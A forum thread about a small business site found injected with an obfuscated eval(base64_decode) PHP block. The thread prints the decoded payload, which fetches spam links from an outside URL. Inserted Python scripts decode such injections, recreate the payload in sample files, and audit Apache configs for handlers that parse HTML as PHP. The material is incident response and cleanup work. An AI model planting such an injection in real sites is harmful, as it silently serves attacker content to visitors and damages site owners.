
Thread: base decode potential hack

  1. #1
    Join Date
    Jul 2008
    Posts
    138
    Thanks
    13
    Thanked 1 Time in 1 Post

    Default base decode potential hack

    Someone contacted me the other day about re-designing a site for them. Upon taking a look at the site (an Apache connection being attempted at the bottom of the HTML page) and viewing the source code, I saw it was loaded with spam links. I immediately advised them of what was going on, and they had no idea.

    ...... was a long string of obfuscated code
    PHP Code:
    <?php eval(base64_decode(".........")); ?>
    I changed "eval" to "print" and got the following...
    PHP Code:
    $l = "http://tourreviews.asia/links2/link.php";   // remote list of spam links to splice into the page
    if (extension_loaded("curl")) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $l);
        $r = curl_exec($ch);
        curl_close($ch);
    } else {
        $r = implode("", file($l));                  // fallback: fetch with file() when cURL is not loaded
    }
    print @$r;                                      // emit whatever the remote server returned
    Luckily this wasn't anything that caused harm, because no code actually executed (maybe "curl" wasn't loaded remotely)...and it was only in index.html. My guess is maybe a remote piece of code was parsing the PHP within the .html extension page.

    I also found a folder on the site named "test" (junior hacker) with a bunch of subfolders w/ html link pages in them.

    This person was wondering if perhaps the previous person that worked on the site could have done something malicious (of course not enough info provided to solve on the forum). I couldn't see anything in the log files that stood out to me, but I thought I would post to see if anyone had any thoughts.
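Swapping eval for print, as the post above did, still hands the payload to PHP on a machine you control. The following is an added example, not code from the thread, that does the same unwrapping statically in Python: it walks a web root, finds eval(...) wrappers around base64_decode, undoes them without executing anything, and pulls out the URLs the decoded code contacts. It also handles the gzinflate, gzuncompress and str_rot13 layers this family of injections commonly stacks, which is a generalization beyond the single base64 layer in the post. The sample web root it scans is constructed inline; the only real string in it is the decoded script from the post, re-encoded as test input.

```python
"""Statically decode eval(base64_decode(...)) injections found under a web root.

Added example, not code from the thread. Nothing here executes the payload:
the wrappers are undone in Python and the result is returned as text, which
is what swapping eval for print showed, minus letting PHP run anything.
"""
import base64
import codecs
import os
import re
import tempfile
import zlib

# eval( <one or more wrapper calls> ( "<payload>"  -- the thread's
# eval(base64_decode("...")) plus the gzinflate/str_rot13 layers this family
# of injections commonly stacks (an assumption beyond the single post).
WRAPPED_EVAL = re.compile(
    r"eval\s*\(\s*((?:(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(\s*)+)"
    r"['\"]([^'\"]*)['\"]",
    re.IGNORECASE,
)
WRAPPER_NAME = re.compile(r"gzinflate|gzuncompress|base64_decode|str_rot13", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"<>)]+")
SCAN_SUFFIXES = (".php", ".phtml", ".inc", ".html", ".htm")

# The script the post decoded, used only as plaintext for the constructed samples.
DECODED_FROM_THREAD = (
    '$l="http://tourreviews.asia/links2/link.php"; '
    'if (extension_loaded("curl")){ $ch = curl_init(); '
    'curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); '
    'curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);} '
    'else{$r=implode("",file($l));} print @$r;'
)


def unwrap(chain: str, payload: str) -> bytes:
    """Undo the wrapper calls innermost-first; a pure-Python stand-in for each PHP function."""
    data = payload.encode("latin-1")
    for name in reversed(WRAPPER_NAME.findall(chain)):
        name = name.lower()
        if name == "base64_decode":
            data = base64.b64decode(data)                  # lenient, like PHP's default mode
        elif name == "gzinflate":
            data = zlib.decompress(data, -zlib.MAX_WBITS)  # raw DEFLATE stream
        elif name == "gzuncompress":
            data = zlib.decompress(data)                   # zlib-framed stream
        elif name == "str_rot13":
            data = codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")
    return data


def decode_layers(text: str, max_layers: int = 8) -> tuple:
    """Peel nested eval(...) wrappers until plain source remains; returns (source, layers)."""
    layers = 0
    while layers < max_layers:
        m = WRAPPED_EVAL.search(text)
        if not m:
            break
        text = unwrap(m.group(1), m.group(2)).decode("utf-8", "replace")
        layers += 1
    return text, layers


def scan_tree(root: str) -> list:
    """Walk root and report every wrapped eval with its decoded source and any URLs in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            if not fname.lower().endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="latin-1") as fh:
                content = fh.read()
            for m in WRAPPED_EVAL.finditer(content):
                decoded, layers = decode_layers(m.group(0))
                findings.append({
                    "file": os.path.relpath(path, root).replace(os.sep, "/"),
                    "offset": m.start(),
                    "layers": layers,
                    "decoded": decoded,
                    "urls": URL.findall(decoded),
                })
    return findings


def build_sample_tree() -> str:
    """Constructed web root: the post's one-liner in index.html and a two-layer variant under test/."""
    root = tempfile.mkdtemp(prefix="webroot_")
    one_layer = base64.b64encode(DECODED_FROM_THREAD.encode()).decode()
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body>Welcome</body></html>\n")
        fh.write(f'<?php eval(base64_decode("{one_layer}")); ?>\n')
    os.makedirs(os.path.join(root, "test", "links1"))
    deflater = zlib.compressobj(wbits=-zlib.MAX_WBITS)      # raw DEFLATE, what gzinflate expects
    raw = deflater.compress(f'eval(base64_decode("{one_layer}"));'.encode()) + deflater.flush()
    with open(os.path.join(root, "test", "links1", "page.php"), "w") as fh:
        fh.write(f'<?php eval(gzinflate(base64_decode("{base64.b64encode(raw).decode()}"))); ?>\n')
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"{f['file']} @{f['offset']}: {f['layers']} layer(s), contacts {f['urls']}")
        print("   ", f["decoded"])
```

Run it against the real document root (scan_tree("/path/to/htdocs")) instead of the sample; the URL list per finding is what you hand to the host when asking whether other accounts on the box are fetching the same link list.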

  2. #2
    Join Date
    Jul 2006
    Posts
    497
    Thanks
    8
    Thanked 70 Times in 70 Posts

    Default

    I'm clueless about the spam mess but curious... How was PHP code in an HTML page? Is Apache set to parse HTML pages?
    -- Chris
    informal JavaScript student of Douglas Crockford
    I like wikis - a lot.

  3. #3
    Join Date
    Jul 2008
    Posts
    138
    Thanks
    13
    Thanked 1 Time in 1 Post

    Default

    Hackers can attempt stuff on any site really, but this is sort of a mystery on why someone would target this site that gets hardly any traffic to serve spam links. Tends to make me think that someone that worked on it previously was involved, but I can't say for sure. Server exploit might be another possibility.

    I looked and the server this site is hosted on with plain .html extension pages is...Apache/1.3.29 (Unix) PHP/5.2.5 FrontPage/5.0.2.2623

    That's what I was curious about, Jesdisciple. When I gained server access I took a look at the index.html file and the php base64 script was contained in php tags like normal. Not sure if somehow a remote script was allowing it to execute even though it was contained within an .html page. When I viewed the source of the page it actually showed spam links.

    I can easily clean the junk out of the index.html page and I have already started the new design, but this was more of a curiosity thing to see if anyone else had come across anything like this before.

  4. #4
    Join Date
    Jul 2006
    Posts
    497
    Thanks
    8
    Thanked 70 Times in 70 Posts

    Default

    Where is Apache's main configuration file? (You should ask your host if you don't know.) Also, do any of the web-accessible directories contain files named .htaccess?

    Once you find any of those, use Ctrl+F to find AddHandler and (in the main config file) AccessFileName in them, and report the lines you find. (If you see a \ at the end of any line, copy the next line with it.)

    If anyone has any thing to add, please say it; I'm definitely in over my head and swimming in this thread.

    EDIT: BTW, if I'm correct (which I'm pretty sure I am), your server has an unnecessary load on it of parsing every .html page in case it contains PHP code. This would also seem to imply that it was the developer who did this stuff.
    Last edited by Jesdisciple; 08-09-2008 at 05:43 AM.
    -- Chris
    informal JavaScript student of Douglas Crockford
    I like wikis - a lot.
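The check Chris describes (find httpd.conf and any .htaccess, pull out AddHandler and AccessFileName, join any line ending in a backslash with the one after it) is mechanical enough to script. Below is an added example, not from the thread, that runs that audit in Python over constructed httpd.conf and .htaccess text rather than a live server. It flags AddHandler and AddType lines that map .html/.htm to a PHP handler, and SetHandler inside a <Files>/<FilesMatch> block whose pattern mentions html; the handler names it recognizes (application/x-httpd-php and phpN-script) are the mod_php ones, an assumption on my part about what this host runs, and the sample directives are made up to match the pattern the thread is hunting for.

```python
"""Audit Apache config text for directives that hand .html files to PHP.

Added example, not code from the thread. It implements the check asked for
above (AddHandler / AccessFileName, with backslash continuations joined) over
constructed httpd.conf and .htaccess text; nothing here touches a live server.
"""
import re

# Handler/MIME names mod_php registers. Assumption about this host's PHP setup.
PHP_HANDLER = re.compile(r"application/x-httpd-php\d*|php\d*-script", re.IGNORECASE)


def logical_lines(text: str):
    """Yield (first_line_no, directive) with backslash continuations joined and comments dropped."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip()
        if start is None:
            start = no
        if line.endswith("\\"):
            buf += line[:-1] + " "   # continuation: keep collecting
            continue
        joined = (buf + line).strip()
        first, buf, start = start, "", None
        if joined and not joined.startswith("#"):
            yield first, joined


def audit(conf_text: str, source: str = "httpd.conf") -> dict:
    """Return the AccessFileName list and every directive that routes .html/.htm through PHP."""
    result = {"access_file_names": [".htaccess"], "php_html": []}   # Apache's default name
    enclosing = None   # the <Files ...>/<FilesMatch ...> line we are inside, if any
    for no, line in logical_lines(conf_text):
        words = line.split()
        directive = words[0].lower()
        if directive == "accessfilename":
            result["access_file_names"] = words[1:]
        elif directive in ("<files", "<filesmatch"):
            enclosing = line
        elif directive in ("</files>", "</filesmatch>"):
            enclosing = None
        elif directive in ("addhandler", "addtype") and len(words) > 2 and PHP_HANDLER.search(words[1]):
            exts = {w.lower().lstrip(".") for w in words[2:]}
            if exts & {"html", "htm"}:
                result["php_html"].append((source, no, line))
        elif (directive == "sethandler" and PHP_HANDLER.search(line) and enclosing
              and re.search(r"html?", enclosing, re.IGNORECASE)):
            result["php_html"].append((source, no, f"{enclosing} ... {line}"))
    return result


# Constructed samples, written to match the pattern the thread is hunting for.
SAMPLE_HTTPD_CONF = """\
ServerRoot "/usr/local/apache"
AccessFileName .htaccess
AddType application/x-httpd-php .php
# someone once asked for "php in html" and it never got reverted:
AddHandler application/x-httpd-php .php \\
    .html .htm
"""

SAMPLE_HTACCESS = """\
<FilesMatch "\\.html$">
    SetHandler application/x-httpd-php
</FilesMatch>
"""

SAMPLE_CLEAN = "AddType application/x-httpd-php .php\n"


if __name__ == "__main__":
    for name, text in (("httpd.conf", SAMPLE_HTTPD_CONF), (".htaccess", SAMPLE_HTACCESS)):
        report = audit(text, name)
        print(name, "AccessFileName:", report["access_file_names"])
        for src, no, line in report["php_html"]:
            print(f"  {src}:{no}: {line}")
```

Feed it the real files (open("httpd.conf").read(), and every file named as AccessFileName reports under the web root) once the host hands them over; a hit on the AddHandler/AddType line is the "unnecessary load" Chris mentions, and it is also what let a PHP block inside index.html run at all.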

  5. #5
    Join Date
    Jul 2008
    Posts
    138
    Thanks
    13
    Thanked 1 Time in 1 Post

    Default

    Sorry for the late reply. No .htaccess files on the server that I saw, but I have worked on servers before where they weren't visible right away since technically they are supposed to be "hidden" files.

    I plan to use php for the new site, and I don't think the last developer had any experience with php so they reverted to the .html extension pages.

  6. #6
    Join Date
    Jul 2006
    Posts
    497
    Thanks
    8
    Thanked 70 Times in 70 Posts

    Default

    Yes, they are hidden by default on *nix. But, if the developer is allowed to use them, the host must have a means for you to access them. If the developer isn't allowed to use them, I don't think we need to worry about them (unless there's a serious security hole somewhere).

    Have you asked your host about the .conf file? We need any AddHandler and AccessFileName directives out of it.
    -- Chris
    informal JavaScript student of Douglas Crockford
    I like wikis - a lot.

  7. #7
    Join Date
    Jul 2008
    Posts
    138
    Thanks
    13
    Thanked 1 Time in 1 Post

    Default

    I found a blank folder named "conf" but that was it. They are hosted with a company named globat which I had never heard of before...and I emailed them but haven't heard anything yet. For now, I removed the garbage out of the page and it loads much faster.

  8. #8
    Join Date
    Jul 2006
    Posts
    497
    Thanks
    8
    Thanked 70 Times in 70 Posts

    Default

    Well, I don't guess we can do anything until they respond... I'll keep my subscription to this thread; just reply to resume the exploration.
    -- Chris
    informal JavaScript student of Douglas Crockford
    I like wikis - a lot.

  9. #9
    Join Date
    Jul 2008
    Posts
    138
    Thanks
    13
    Thanked 1 Time in 1 Post

    Default

    The site is pretty much complete, and I just heard back from the hosting company

    When I asked about the "conf" folder and the possibility of any hidden files that could be running eventHandlers I was told that it's a default folder on their server setup and there are no hidden files in it.

    When I asked about the 2 different stats folders because "old_stats" seemed a little odd, the answer they provided was how to access the site stats through the control panel.

    When I explained there was a folder named "test" with 5 folders full of spam links, and 2 blank .zip files in that folder, I was told that I could delete that by logging into FTP and removing it...YOU THINK?

    I asked about spam links and specifics to see if I could try to find out if they could spot a potential exploit on the server, or if they knew if it was an isolated incident to this site alone. Either they didn't want to admit that it could have been a potential exploit on their server, or they really had no idea.

    Changing the passwords was the first thing that I did just in case there was a remote script uploading new viruses, but that was also another suggestion offered by support.

    Thanks again Jesdisciple for your input. I've already cleared out all the spam links in the folders, and have started to upload the new site which seems to be ok so far.

  10. #10
    Join Date
    Jul 2006
    Posts
    497
    Thanks
    8
    Thanked 70 Times in 70 Posts

    Default

    I'm by no means security-savvy, so we may be overreacting here. I just have some admin experience from being a hobbyist developer.

    But I reiterate (because I don't see that you mentioned it) that I think your server has an unnecessary load. To confirm this, just put some Hello World PHP in a .html file and try requesting it. Unless your host considers that a feature, they should be eager to fix it and that might trigger some genuine concern for security. EDIT: Note that the previous developer may have requested of the host that .html files be parsed for PHP; don't assume it's not supposed to be like that.
    Last edited by Jesdisciple; 08-28-2008 at 02:26 AM.
    -- Chris
    informal JavaScript student of Douglas Crockford
    I like wikis - a lot.
